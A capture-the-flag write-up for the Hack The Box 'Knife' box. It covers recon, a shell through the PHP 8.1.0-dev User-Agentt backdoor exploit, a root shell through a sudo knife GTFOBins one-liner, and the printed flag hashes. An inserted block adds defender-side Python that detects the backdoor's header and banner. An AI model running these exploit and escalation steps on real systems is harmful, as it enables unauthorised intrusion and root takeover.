Target // Knife
Platform: HTB
OS: Linux
Difficulty: Easy
IP: 10.129.44.1

Recon

Nmap

nmap -sC -sV -oN nmap/initial 10.129.44.1
Nmap output:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH
80/tcp open  http    Apache httpd 2.4.6

OS: Linux (Ubuntu, kernel 5.4.0-80-generic)


Enumeration

Port 80 - Web App

Running Nuclei against the target immediately flags something critical:

[php-zerodium-backdoor-rce] [http] [critical] http://10.129.44.1

That’s a big red flag. The server is running PHP 8.1.0-dev which contains a backdoor planted by attackers in the PHP source code repository.


Foothold

PHP 8.1.0-dev Backdoor RCE

Researching php-zerodium-backdoor-rce leads to this writeup and an ExploitDB entry.

The backdoor allows arbitrary code execution via a crafted User-Agentt header (note the double t). There are ready-made exploits available – just point and shoot:

python3 exploit.py http://10.129.44.1

We land a shell as james.
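From the defender's side, the two indicators this section relies on are easy to check for: a server advertising the 8.1.0-dev build in its X-Powered-By response header, and inbound requests carrying the non-standard User-Agentt header. The following is an added example written for this writeup, not code from the original post or from the exploit it references; the HTTP messages are constructed samples and the header values are placeholders.

```python
# Added example (not part of the original writeup): defender-side checks for the two
# indicators in this section. Sample traffic below is constructed; no real hosts involved.

BACKDOORED_PHP_BANNER = "PHP/8.1.0-dev"   # version string the backdoored build advertises
TRIGGER_HEADER = "user-agentt"            # non-standard header name the backdoor reads


def parse_headers(raw_message: str) -> dict:
    """Return the headers of a raw HTTP request or response, names lowercased.

    Only the head (before the blank line) is parsed and the start line is skipped.
    Duplicate names keep the last value, which is enough for these checks.
    """
    head = raw_message.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def advertises_backdoored_php(raw_response: str) -> bool:
    """True if X-Powered-By names the 8.1.0-dev build (the version the recon above spotted)."""
    return parse_headers(raw_response).get("x-powered-by", "") == BACKDOORED_PHP_BANNER


def carries_trigger_header(raw_request: str) -> bool:
    """True if the request has a User-Agentt header; no legitimate client sends one."""
    return TRIGGER_HEADER in parse_headers(raw_request)


def flag_suspicious(raw_requests: list) -> list:
    """Indexes of the requests that should raise an alert."""
    return [i for i, req in enumerate(raw_requests) if carries_trigger_header(req)]


# Constructed samples: a normal request and one that would reach the backdoor code path.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nServer: Apache/2.4.6\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>"
)
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agentt: placeholder-value\r\n\r\n",
]

if __name__ == "__main__":
    print("backdoored build:", advertises_backdoored_php(SAMPLE_RESPONSE))  # True
    print("suspicious requests:", flag_suspicious(SAMPLE_REQUESTS))         # [1]
```

The header-name match is case-insensitive, so a WAF or log-review rule built on the same logic catches variants such as USER-AGENTT as well.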


Privilege Escalation

GTFOBins - knife

Checking sudo permissions:

james@knife

$ sudo -l
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife is a Chef infrastructure tool and it’s on GTFOBins. Instant root:

sudo knife exec -E 'exec "/bin/bash"'

Proof

root@knife

root@knife:/home/james# cat user.txt
ba62e576a2e7e468eb51b8bf13be1301
root@knife:/home/james# cat /root/root.txt
8a29936c83b58483940c3765b3792ff9

Key Takeaways

[ Note ]
  • Always check response headers and run Nuclei – the PHP backdoor was immediately flagged
  • sudo -l is always the first privesc check – GTFOBins makes it trivial when a listed binary is available
  • This box took ~30 minutes; a very straightforward attack chain